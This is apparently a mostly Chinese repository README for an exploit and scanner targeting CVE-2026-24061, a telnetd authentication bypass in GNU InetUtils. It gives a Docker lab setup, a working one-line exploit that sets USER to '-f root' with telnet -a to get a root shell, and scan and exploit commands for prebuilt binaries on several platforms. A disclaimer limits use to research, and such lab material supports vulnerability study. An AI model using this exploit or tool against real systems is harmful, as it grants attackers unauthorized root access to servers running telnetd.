
Exploit and scanner for CVE-2026-24061, a telnetd authentication bypass that grants root shell via crafted USER environment variable. Includes Docker environment setup and cross-platform exploit binaries.
CVE-2026-24061 是 telnetd 中的一个认证绕过漏洞,攻击者可以通过特定的环境变量组合绕过身份验证,直接获取 root 权限的 shell。
telnetd 在处理认证逻辑时存在缺陷,当通过 -a 选项(自动登录)配合特定的 USER 环境变量(如 -f root)时>,可以绕过正常的身份验证流程,直接以 root 用户身份登录。
GNU InetUtils 是 GNU 项目下的一个基础网络工具集合。它包含了许多传统的网络客户端和守护进程,如 ftp、telnet、rsh、rlogin、tftp 等。
提供一个功能齐全且符合 GNU 风格的基础网络组件库。
telnetd 是这个工具包中负责处理传入 Telnet 连接请求的服务端程序,主要任务是为远程用户提供一个交互式的终端接口(通常是 Shell)。
工作原理
inetd或监听端口 23。当有请求进入时,启动 。xinetdtelnetdlogin 程序验证用户名和密码。参考链接: https://github.com/yanxinwu946/CVE-2026-24061--telnetd https://github.com/vulhub/vulhub/ https://forum.butian.net/share/4766
先将本仓库下载到本地,目录结构如下图
在此目录下,执行如下命令启动具有CVE_2026_24061漏洞的靶场环境
docker compose up -d --build
启动后,telnet 服务将运行在 0.0.0.0:2323

-a 选项用于启用自动登录功能-a 时,telnetd 会读取 USER 环境变量作为登录用户名USER 环境变量设置为 -f root,telnetd 在解析时会错误地将 -f 解释为选项标志,root 作为目标用户# 设置 USER 环境变量并使用 telnet -a 连接
env USER='-f root' telnet -a 127.0.0.1 2323
成功后将获得 root 权限的交互式 shell:

cd exp
可以看见三个文件,exp、exp_darwin、exp.exe分别是Linux,Mac,Windows上的可执行文件,选择自己需要即可,工具源码也提供了,需要其他版本可自行编译,这里我是Linux选择使用exp,有详细的帮助信息
检测漏洞是否存在,默认检测23端口
./exp -mode scan -target your-ip -port your-port
利用漏洞,获取shell
./exp -mode exploit -target your-ip -port your-port

本项目仅用于安全研究和教育目的。请勿在未经授权的系统上使用。使用者需自行承担使用本工具所产生的一切法律责任。